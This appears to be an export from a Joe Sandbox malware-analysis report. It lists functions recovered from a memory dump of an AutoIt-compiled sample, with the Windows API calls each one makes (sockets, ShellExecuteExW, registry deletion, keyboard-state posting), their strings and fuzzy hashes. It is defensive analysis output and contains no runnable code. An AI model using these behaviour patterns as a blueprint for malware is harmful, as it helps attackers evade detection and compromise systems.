Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 106266b8d2f4a849e8e126b6b10a93b125fcb99f603e9ce31ae81bbfdec5bca6
Instruction ID: c8b04a288cecbc349d516a398d1cc4d4635c2d4d13f48cfee4e8bf09a073ce86
Opcode Fuzzy Hash: 106266b8d2f4a849e8e126b6b10a93b125fcb99f603e9ce31ae81bbfdec5bca6
Instruction Fuzzy Hash: AF21D161A012097BAA056725DD82FFB77DCDE10348F08C4E0FD1896747EBA4DF11AEA1

Function 00B8EB23 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON

Download Yara Rule

APIs

Part of subcall function 00B29837: __itow.LIBCMT ref: 00B29862
Part of subcall function 00B29837: __swprintf.LIBCMT ref: 00B298AC

Part of subcall function 00B3FC86: _wcscpy.LIBCMT ref: 00B3FCA9

_wcstok.LIBCMT ref: 00B8EC94
_wcscpy.LIBCMT ref: 00B8ED23
_memset.LIBCMT ref: 00B8ED56

Strings

X, xrefs: 00B8ED93

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: 3da712cf5ad26210fac0bb11c66421bcd3be33ac4c1cf0a8c1fb59822c6ba4f3
Instruction ID: 967e753b66e2bfc943a42564db36283a456067e98943b22c872686b1869b0c91
Opcode Fuzzy Hash: 3da712cf5ad26210fac0bb11c66421bcd3be33ac4c1cf0a8c1fb59822c6ba4f3
Instruction Fuzzy Hash: 4DC19F315087119FC764FF24D885A6AB7E0FF85310F0049ADF8A99B2A2DB30ED45CB96

Function 00B96B03 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00B96C00
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00B96C21
WSAGetLastError.WSOCK32(00000000), ref: 00B96C34
htons.WSOCK32(?,?,?,00000000,?), ref: 00B96CEA
inet_ntoa.WSOCK32(?), ref: 00B96CA7

Part of subcall function 00B7A7E9: _strlen.LIBCMT ref: 00B7A7F3
Part of subcall function 00B7A7E9: _memmove.LIBCMT ref: 00B7A815

_strlen.LIBCMT ref: 00B96D44
_memmove.LIBCMT ref: 00B96DAD

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
String ID:
API String ID: 3619996494-0
Opcode ID: 4915eeae7eaa41344fc6db3888f7da1fda0c2b0f7513b46cdb93e2f9cc952b89
Instruction ID: 0271687709b8c6439836f5fe3cf5d8db1b70581e083622635f13e00521e496b2
Opcode Fuzzy Hash: 4915eeae7eaa41344fc6db3888f7da1fda0c2b0f7513b46cdb93e2f9cc952b89
Instruction Fuzzy Hash: 4481C171204310ABCB10EF24DC86F6AB7E8EF85714F5449ADF5599B2A2DA70DD04CB92

Function 00B21424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e07cde94da431e91698d1497f6cb05bd4bb88b3fe4ad9b2d6f7dbfe0f9f25a20
Instruction ID: 7e8257c94142913b02cf331af130e19df004fdc2fcad1ff9789f88a87d394f37
Opcode Fuzzy Hash: e07cde94da431e91698d1497f6cb05bd4bb88b3fe4ad9b2d6f7dbfe0f9f25a20
Instruction Fuzzy Hash: F8716B30900119EFCB14DF98DC89EBEBBB9FF95310F108599F919AA251C734AA51CF60

Function 00BAB351 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(00CC55E0), ref: 00BAB3EB
IsWindowEnabled.USER32(00CC55E0), ref: 00BAB3F7
SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00BAB4DB
SendMessageW.USER32(00CC55E0,000000B0,?,?), ref: 00BAB512
IsDlgButtonChecked.USER32(?,?), ref: 00BAB54F
GetWindowLongW.USER32(00CC55E0,000000EC), ref: 00BAB571
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00BAB589

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: 2ac185873783cac5f0523def1413ed4020c4b6b617f9d93af20f6c7753581824
Instruction ID: f0f68beda8f7931582a2de18930d5a8aec80571833cba7c37519e2a9410f9d2d
Opcode Fuzzy Hash: 2ac185873783cac5f0523def1413ed4020c4b6b617f9d93af20f6c7753581824
Instruction Fuzzy Hash: F4716B34608245AFDF209F55C8D5FBA7BE9EF0B300F144099E965973A3CB32A950DB50

Function 00B9F41E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B9F448
_memset.LIBCMT ref: 00B9F511
ShellExecuteExW.SHELL32(?), ref: 00B9F556

Part of subcall function 00B29837: __itow.LIBCMT ref: 00B29862
Part of subcall function 00B29837: __swprintf.LIBCMT ref: 00B298AC

Part of subcall function 00B3FC86: _wcscpy.LIBCMT ref: 00B3FCA9

GetProcessId.KERNEL32(00000000), ref: 00B9F5CD
CloseHandle.KERNEL32(00000000), ref: 00B9F5FC

Strings

@, xrefs: 00B9F525

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
String ID: @
API String ID: 3522835683-2766056989
Opcode ID: 4c8ebd39f15c6062c53f5e10ca163afb2e6955677a1a732a7d25615b422f42ae
Instruction ID: 3fc19192e9b07e9d62cf396723b7608b1ebeba48546fa754b7bd257f33d5e8b5
Opcode Fuzzy Hash: 4c8ebd39f15c6062c53f5e10ca163afb2e6955677a1a732a7d25615b422f42ae
Instruction Fuzzy Hash: 96618175A0062ADFCF14DFA4D4819AEBBF5FF49320F1580A9E859AB351CB30AD41CB94

Function 00B80F4D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00B80F8C
GetKeyboardState.USER32(?), ref: 00B80FA1
SetKeyboardState.USER32(?), ref: 00B81002
PostMessageW.USER32(?,00000101,00000010,?), ref: 00B81030
PostMessageW.USER32(?,00000101,00000011,?), ref: 00B8104F
PostMessageW.USER32(?,00000101,00000012,?), ref: 00B81095
PostMessageW.USER32(?,00000101,0000005B,?), ref: 00B810B8

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: a9074a633e0e932a058d847a90ba1fa3bcb925be3217db819d7a4d0d62f3fca2
Instruction ID: 1870366a98f0081a5afc1da27ab664512ff703367de7632af0f87551253d6bd1
Opcode Fuzzy Hash: a9074a633e0e932a058d847a90ba1fa3bcb925be3217db819d7a4d0d62f3fca2
Instruction Fuzzy Hash: 785104605157D53DFB3666388C05BBABEEDDB06300F0889C9E2D8968E3C299DCCAD751

Function 00B80D66 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 00B80DA5
GetKeyboardState.USER32(?), ref: 00B80DBA
SetKeyboardState.USER32(?), ref: 00B80E1B
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00B80E47
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00B80E64
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00B80EA8
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00B80EC9

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 5498bf8dce3ec93ca0355afcee5038e76ecb16e91f12582e607b06f15ddf8478
Instruction ID: 82461fc39bc9017dd36df372457bac518438bb690b0601613d46f319aa6f17fe
Opcode Fuzzy Hash: 5498bf8dce3ec93ca0355afcee5038e76ecb16e91f12582e607b06f15ddf8478
Instruction Fuzzy Hash: A75107A09247D63DFB7277748C45BBB7EE99B06340F0888C9E1D4868E2C395AC9DD750

Function 00B855FD Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 00B8560A
_wcsncpy.LIBCMT ref: 00B8563F
_wcsncpy.LIBCMT ref: 00B85671
_wcsncpy.LIBCMT ref: 00B856A4
_wcsncpy.LIBCMT ref: 00B856E6
_wcsncpy.LIBCMT ref: 00B85720
_wcsncpy.LIBCMT ref: 00B8574F

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: e5bdb14a710ff14f3ad01f3811be08c7ac455e677c3f79683bd9d04feaeda4b1
Instruction ID: 7a0b000160495af7426d978369eac46a6c7b0fc0d01b22d21d781c71d247cbb2
Opcode Fuzzy Hash: e5bdb14a710ff14f3ad01f3811be08c7ac455e677c3f79683bd9d04feaeda4b1
Instruction Fuzzy Hash: 9C415F65C10654B6CB11EBF48886ACFB3FC9F05310F5089A6F518E3221FB34A765D7AA

Function 00B83671 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00B8466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00B83697,?), ref: 00B8468B

Part of subcall function 00B8466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00B83697,?), ref: 00B846A4

lstrcmpiW.KERNEL32(?,?), ref: 00B836B7
_wcscmp.LIBCMT ref: 00B836D3
MoveFileW.KERNEL32(?,?), ref: 00B836EB
_wcscat.LIBCMT ref: 00B83733
SHFileOperationW.SHELL32(?), ref: 00B8379F

Strings

\*.*, xrefs: 00B8372D

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
String ID: \*.*
API String ID: 1377345388-1173974218
Opcode ID: 863efe6ebff24a16a906d060a75b4124c526eb5d9bb2e007f5a639f14806c726
Instruction ID: 85212ae447aff59810b7b0ea954117f65a54412933988d9e512d3887fd124bfa
Opcode Fuzzy Hash: 863efe6ebff24a16a906d060a75b4124c526eb5d9bb2e007f5a639f14806c726
Instruction Fuzzy Hash: B5418F71508345AAC755FF64C442ADFB7E8EF89B80F4009AEF49AC3261EB34D689C752

Function 00BA7291 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00BA72AA
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00BA7351
IsMenu.USER32(?), ref: 00BA7369
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00BA73B1
DrawMenuBar.USER32 ref: 00BA73C4

Strings

0, xrefs: 00BA729E

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert_memset
String ID: 0
API String ID: 3866635326-4108050209
Opcode ID: a1d6569c5a142d524c91e5de58de846b2276e7cb12bcd1fd4970df81bc74c214
Instruction ID: 5682a75d47f8f5d8cbd4eba41dd36e8569c3d6b477e193c2a97b143693525e81
Opcode Fuzzy Hash: a1d6569c5a142d524c91e5de58de846b2276e7cb12bcd1fd4970df81bc74c214
Instruction Fuzzy Hash: 25414675A48209EFDF20DF90D884AAABBF8FF06314F1584A9FD05AB250DB30AD15DB50

Function 00BA0FA5 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00BA0FD4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00BA0FFE
FreeLibrary.KERNEL32(00000000), ref: 00BA10B5

Part of subcall function 00BA0FA5: RegCloseKey.ADVAPI32(?), ref: 00BA101B
Part of subcall function 00BA0FA5: FreeLibrary.KERNEL32(?), ref: 00BA106D
Part of subcall function 00BA0FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00BA1090

RegDeleteKeyW.ADVAPI32(?,?), ref: 00BA1058

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: ed46e25dae48e3ef8282ac28d3f3086df384b2c26d7640864932d6dd655a6e7f
Instruction ID: ab7d889dd4ac72104211c4f8931b3f44ac7c7be7f56aae0927ddc3a875f5f71d
Opcode Fuzzy Hash: ed46e25dae48e3ef8282ac28d3f3086df384b2c26d7640864932d6dd655a6e7f
Instruction Fuzzy Hash: 67312D71905109BFDB259F94DC89EFFB7BCEF09310F0045AAE501E3141EA749E859BA0

Function 00BA62CD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00BA62EC
GetWindowLongW.USER32(00CC55E0,000000F0), ref: 00BA631F
GetWindowLongW.USER32(00CC55E0,000000F0), ref: 00BA6354
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00BA6386
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00BA63B0
GetWindowLongW.USER32(00000000,000000F0), ref: 00BA63C1
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00BA63DB

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: b4023d2a2e83d686d290951a44fdb7517bb30262787a1159eb2c1baf1a97eb30
Instruction ID: b61091c2d4c27ce757d5e3f02a6d8b904ad4d138af6793ddbe7a8c416ce1efe2
Opcode Fuzzy Hash: b4023d2a2e83d686d290951a44fdb7517bb30262787a1159eb2c1baf1a97eb30
Instruction Fuzzy Hash: B4310D74648285EFDB208F5CDC85FA937E1FB4A714F1901A8F6118F2B2CB71A841DB54

Function 00B7DAEB Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B7DB2E
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B7DB54
SysAllocString.OLEAUT32(00000000), ref: 00B7DB57
SysAllocString.OLEAUT32(?), ref: 00B7DB75
SysFreeString.OLEAUT32(?), ref: 00B7DB7E
StringFromGUID2.OLE32(?,?,00000028), ref: 00B7DBA3
SysAllocString.OLEAUT32(?), ref: 00B7DBB1

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: b9db36e42a15b871a7998c3bcfd9c64beb051239aa05a400e0e68b01b67117b2
Instruction ID: 199265c3ea3e4435ac4c3c888ce3606cf9583b5c80c9cefec579c157fdc41593
Opcode Fuzzy Hash: b9db36e42a15b871a7998c3bcfd9c64beb051239aa05a400e0e68b01b67117b2
Instruction Fuzzy Hash: FA217136600219AFDF109FB8DC85CBB73FCEF093A0B018565F918DB250DA709C418764

Function 00B96173 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00B97D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00B97DB6

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00B961C6
WSAGetLastError.WSOCK32(00000000), ref: 00B961D5
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00B9620E
connect.WSOCK32(00000000,?,00000010), ref: 00B96217
WSAGetLastError.WSOCK32 ref: 00B96221
closesocket.WSOCK32(00000000), ref: 00B9624A
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00B96263

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
String ID:
API String ID: 910771015-0
Opcode ID: 6579d3828fa0fe63172bf1bc55453255d89dc8a2131afe3cd084c5a458f0d65c
Instruction ID: f2d8530f95978006a1a45d94081fc30fed18d4094af287e32768112db704ddd8
Opcode Fuzzy Hash: 6579d3828fa0fe63172bf1bc55453255d89dc8a2131afe3cd084c5a458f0d65c
Instruction Fuzzy Hash: E131AF71600118AFDF10AF64DC85BBE7BECEF45760F0480B9F909AB291DB74AD048BA1

Function 00B7F65E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00B7F671
__wcsnicmp.LIBCMT ref: 00B7F692
__wcsnicmp.LIBCMT ref: 00B7F6AC

Strings

#requireadmin, xrefs: 00B7F68C
#OnAutoItStartRegister, xrefs: 00B7F6A6
#notrayicon, xrefs: 00B7F669

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 1038674560-2734436370
Opcode ID: cbee5d11d856f95d9a928015c521e2bf417922c19826e3daf0a8421b0a252e0e
Instruction ID: 48d9a7ff73b11d217c4e024288ea94857bf63f8022364c670042cec2b3e0b378
Opcode Fuzzy Hash: cbee5d11d856f95d9a928015c521e2bf417922c19826e3daf0a8421b0a252e0e
Instruction Fuzzy Hash: 71216B7220411366D634BB34AC02EB773D8DF55740F14C0B9F9AE970A1EB909E41E399

Function 00B7DBC4 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B7DC09
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B7DC2F
SysAllocString.OLEAUT32(00000000), ref: 00B7DC32
SysAllocString.OLEAUT32 ref: 00B7DC53
SysFreeString.OLEAUT32 ref: 00B7DC5C
StringFromGUID2.OLE32(?,?,00000028), ref: 00B7DC76
SysAllocString.OLEAUT32(?), ref: 00B7DC84

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

